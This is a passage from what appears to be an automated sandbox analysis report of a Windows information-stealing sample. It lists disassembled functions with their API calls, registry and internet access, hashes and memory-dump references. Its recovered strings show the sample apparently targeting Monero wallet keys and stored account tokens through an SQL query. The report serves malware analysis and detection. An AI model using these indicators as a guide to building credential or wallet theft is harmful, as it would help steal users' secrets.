                    • CloseHandle.KERNEL32(?,?,00000400), ref: 00636249
                    • InternetCloseHandle.WININET(?), ref: 00636253
                    • InternetCloseHandle.WININET(00000000), ref: 00636260
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                    • String ID:
                    • API String ID: 2507841554-0
                    • Opcode ID: 29eaa441706e87475d21afa0f87debc6b6c2727b06f2b20b9b7978160ee217ee
                    • Instruction ID: 972e823d7b9201fd2db9545c887226defc57c73972a1aa4a9cc7d0ebc839fe4e
                    • Opcode Fuzzy Hash: 29eaa441706e87475d21afa0f87debc6b6c2727b06f2b20b9b7978160ee217ee
                    • Instruction Fuzzy Hash: CA514171940218BBDB24DF90DC49BEE77BAFB44705F108098B609A71C1DB74AA85CF95
                    Function 0063BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                      • Part of subcall function 0064A9B0: lstrlen.KERNEL32(?,01449E88,?,\Monero\wallet.keys,00650E17), ref: 0064A9C5
                      • Part of subcall function 0064A9B0: lstrcpy.KERNEL32(00000000), ref: 0064AA04
                      • Part of subcall function 0064A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0064AA12
                      • Part of subcall function 0064A920: lstrcpy.KERNEL32(00000000,?), ref: 0064A972
                      • Part of subcall function 0064A920: lstrcat.KERNEL32(00000000), ref: 0064A982
                      • Part of subcall function 0064A8A0: lstrcpy.KERNEL32(?,00650E17), ref: 0064A905
                      • Part of subcall function 0064A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0064A7E6
                    • lstrlen.KERNEL32(00000000), ref: 0063BC9F
                      • Part of subcall function 00648E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00648E52
                    • StrStrA.SHLWAPI(00000000,AccountId), ref: 0063BCCD
                    • lstrlen.KERNEL32(00000000), ref: 0063BDA5
                    • lstrlen.KERNEL32(00000000), ref: 0063BDB9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                    • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                    • API String ID: 3073930149-1079375795
                    • Opcode ID: 07fcd334d6a3cc6cd41c4189edf2a6c3fee4a34ef7b8f0618d0ad5b8f0ce68ce
                    • Instruction ID: 5a81a538920e1eef1a202c26f806d4123c640bc0ea390cd362036de5ea12403f
                    • Opcode Fuzzy Hash: 07fcd334d6a3cc6cd41c4189edf2a6c3fee4a34ef7b8f0618d0ad5b8f0ce68ce
                    • Instruction Fuzzy Hash: E3B14F71950108BBEB48EBE0DC96EEE733AFF54300F41415CF506A6091EF34AA49CBA6
                    Function 00646770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExitProcess$DefaultLangUser
                    • String ID: *
                    • API String ID: 1494266314-163128923
                    • Opcode ID: 267f32bcb0cbf858df70d673729166937cc0ed3d54e75f9be75acea31629588b
                    • Instruction ID: 1c6d514ccee3e68ef976e8355cf4fa173d4dc6a85d641155b68a4478d20ed996
                    • Opcode Fuzzy Hash: 267f32bcb0cbf858df70d673729166937cc0ed3d54e75f9be75acea31629588b
                    • Instruction Fuzzy Hash: F9F03A3090420DEFD34C9FE0E90D76C7B70FB45747F040198F64986294D6748A829B96
                    Function 00634FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00634FCA
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00634FD1
                    • InternetOpenA.WININET(00650DDF,00000000,00000000,00000000,00000000), ref: 00634FEA
                    • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00635011
                    • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00635041
                    • InternetCloseHandle.WININET(?), ref: 006350B9
                    • InternetCloseHandle.WININET(?), ref: 006350C6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                    • String ID:
                    • API String ID: 3066467675-0
                    • Opcode ID: 225d54a82c9c156fc38ec64e86863e0a2f03824dce10a1f38b9a514404cc41b6
                    • Instruction ID: 0b8c2701699a3f74f05176ecb2a7e957d05c779c4d66c1f3166385ea29284c68
                    • Opcode Fuzzy Hash: 225d54a82c9c156fc38ec64e86863e0a2f03824dce10a1f38b9a514404cc41b6
                    • Instruction Fuzzy Hash: 9F31F9B4A40218ABDB24CF54DC89BDCB7B5FB48704F1081D9FA09A7285C7706EC58F99
                    Function 00648100 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 67memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,01450228,00000000,?,00650E2C,00000000,?,00000000), ref: 00648130
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00648137
                    • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00648158
                    • wsprintfA.USER32 ref: 006481AC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                    • String ID: %d MB$@
                    • API String ID: 2922868504-3474575989
                    • Opcode ID: b095ea2aacda836f471db228a31794356334804935215b5fad34de6503ba1a3b
                    • Instruction ID: 2308df692471e4261baa7e2a0aa5f71c252b4357759eb13e0442e69cf09d04e3
                    • Opcode Fuzzy Hash: b095ea2aacda836f471db228a31794356334804935215b5fad34de6503ba1a3b
                    • Instruction Fuzzy Hash: 6B214AB1E44209ABDB04DFD4CC49FAEB7B9FB44B04F104219F605BB280C778A9018BA9
                    Function 006483DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                    Download Yara Rule
                    APIs
                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00648426
                    • wsprintfA.USER32 ref: 00648459
                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0064847B
                    • RegCloseKey.ADVAPI32(00000000), ref: 0064848C
                    • RegCloseKey.ADVAPI32(00000000), ref: 00648499
                      • Part of subcall function 0064A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0064A7E6
                    • RegQueryValueExA.ADVAPI32(00000000,014500A8,00000000,000F003F,?,00000400), ref: 006484EC
                    • lstrlen.KERNEL32(?), ref: 00648501
                    • RegQueryValueExA.ADVAPI32(00000000,01450150,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00650B34), ref: 00648599
                    • RegCloseKey.ADVAPI32(00000000), ref: 00648608
                    • RegCloseKey.ADVAPI32(00000000), ref: 0064861A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                    • String ID: %s\%s
                    • API String ID: 3896182533-4073750446
                    • Opcode ID: 53a4cceef4f3bf3ae4df5abfdc834ccf890e6a621329cf91b34e9d9e7617e49f
                    • Instruction ID: 063b2849540b9b36e5c7966611795b6a091b9c7cc850de92520467ce1e1693b6
                    • Opcode Fuzzy Hash: 53a4cceef4f3bf3ae4df5abfdc834ccf890e6a621329cf91b34e9d9e7617e49f
                    • Instruction Fuzzy Hash: 05210A71900218AFDB68DB54DC85FE9B3B9FB48705F00C198A609A6180DF71AAC5CFD5
                    Function 00647690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006476A4
                    • RtlAllocateHeap.NTDLL(00000000), ref: 006476AB
                    • RegOpenKeyExA.ADVAPI32(80000002,0143CEB8,00000000,00020119,00000000), ref: 006476DD
                    • RegQueryValueExA.ADVAPI32(00000000,014501E0,00000000,00000000,?,000000FF), ref: 006476FE
                    • RegCloseKey.ADVAPI32(00000000), ref: 00647708
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                    • String ID: Windows 11
                    • API String ID: 3225020163-2517555085
                    • Opcode ID: ec01eab0967688e69f58668368f29564da6a37855785c655b582c4e343c90866
                    • Instruction ID: ce1d846d6d293bf9fa86011c3f8dd771b1e2be921f21bffed63f3520afedddff
                    • Opcode Fuzzy Hash: ec01eab0967688e69f58668368f29564da6a37855785c655b582c4e343c90866
                    • Instruction Fuzzy Hash: 9B014FB5A44204BBEB04DBE4DC4DFADB7B9FB88702F104454FA08A7295D771D9848B92
                    Function 00647720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00647734
                    • RtlAllocateHeap.NTDLL(00000000), ref: 0064773B
                    • RegOpenKeyExA.ADVAPI32(80000002,0143CEB8,00000000,00020119,006476B9), ref: 0064775B
                    • RegQueryValueExA.ADVAPI32(006476B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0064777A
                    • RegCloseKey.ADVAPI32(006476B9), ref: 00647784
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                    • String ID: CurrentBuildNumber
                    • API String ID: 3225020163-1022791448
                    • Opcode ID: 68d867e4804959c438b8244e2c70af9200942eb97074bf8af3533bd295e38416
                    • Instruction ID: 83ead87491061b66983fc8ab43b73ab4905144823a504594023282e78c3a05b3
                    • Opcode Fuzzy Hash: 68d867e4804959c438b8244e2c70af9200942eb97074bf8af3533bd295e38416
                    • Instruction Fuzzy Hash: 7E0144B5A40308BBE704DBE4DC4DFAEB7B8FB84705F104558FA09A7285D67095408B52
                    Function 006492E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileA.KERNEL32(:d,80000000,00000003,00000000,00000003,00000080,00000000,?,00643AEE,?), ref: 006492FC
                    • GetFileSizeEx.KERNEL32(000000FF,:d), ref: 00649319
                    • CloseHandle.KERNEL32(000000FF), ref: 00649327
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CloseCreateHandleSize
                    • String ID: :d$:d
                    • API String ID: 1378416451-2737858857
                    • Opcode ID: ebee48d0f3d28f9d4c02d9886a4eaeefe3cf5b1be0bc197b9acf506aca29d726
                    • Instruction ID: 31b7093225a06c170003ae1b242026bd136bdacb77d16dc46cc00c56eab258f8
                    • Opcode Fuzzy Hash: ebee48d0f3d28f9d4c02d9886a4eaeefe3cf5b1be0bc197b9acf506aca29d726
                    • Instruction Fuzzy Hash: 86F08C34E40208BBDB18DFB0DC09F9E77FABB88350F108254B655A72C4D670DA818F50
                    Function 006440B0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 006440D5
                    • RegOpenKeyExA.ADVAPI32(80000001,0144E7A0,00000000,00020119,?), ref: 006440F4
                    • RegQueryValueExA.ADVAPI32(?,014504E0,00000000,00000000,00000000,000000FF), ref: 00644118
                    • RegCloseKey.ADVAPI32(?), ref: 00644122
                    • lstrcat.KERNEL32(?,00000000), ref: 00644147
                    • lstrcat.KERNEL32(?,01450450), ref: 0064415B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$CloseOpenQueryValuememset
                    • String ID:
                    • API String ID: 2623679115-0
                    • Opcode ID: 2f4857f697b95f273a9490bb83d72261b670b3a9eefcfdd3dbec9401e5d02da0
                    • Instruction ID: c8f6843053167a55145de2d4ca3c5ee677e6fe6be0590617af30a51a1568fe88
                    • Opcode Fuzzy Hash: 2f4857f697b95f273a9490bb83d72261b670b3a9eefcfdd3dbec9401e5d02da0
                    • Instruction Fuzzy Hash: AB416AB69001086BDB18FBA0DC5AFFE737DB788300F40455DB61A57185EA759BC88BD2
                    Function 006399C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                    Download Yara Rule
                    APIs
